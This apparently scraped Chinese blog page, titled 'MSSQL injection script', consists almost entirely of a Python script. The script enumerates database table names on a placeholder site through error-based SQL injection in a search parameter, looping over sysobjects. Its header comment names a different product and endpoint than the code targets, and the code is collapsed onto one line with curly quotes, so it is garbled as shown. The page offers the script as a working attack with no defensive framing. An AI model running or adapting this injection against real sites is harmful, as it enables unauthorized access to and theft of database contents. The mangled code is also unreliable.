mssql-注入脚本

coding:utf-8 # Author:LSA # Description:hishop sqli for /user/UserRefundApply?OrderId= # Date:20190701 import sys import requests from bs4 import BeautifulSoup import re headers = { ‘ Cookie ‘ : ‘‘ , ‘ User-Agent ‘ : ‘ Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 ‘ } global tables_name tables_name = " ‘XWCMFLOWACTION‘ " # print tables_name def brute_tables(url): for i in range(0,300 ): url = ‘ http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20( ‘ + tables_name + ‘ ))%3E0-- ‘ print url rsp = requests.get(url,headers= headers) soup = BeautifulSoup(rsp.text, " lxml " ) title = soup.p.text print title table_name = re.findall(r " ‘(.*?)‘ " ,title) print table_name print table_name[0] global tables_name tables_name = tables_name + ‘ ,\‘ ‘ + table_name[0] + ‘ \‘ ‘ print tables_name def main(url): brute_tables(url) if __name__ == ‘ __main__ ‘ : url = ‘ http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20( ‘ + tables_name + ‘ ))%3E0-- ‘ main(url)

 

mssql-注入脚本

标签：code   rgb   mss   pre   HERE   gecko   find   win64   title   

查看更多关于mssql-注入脚本的详细内容...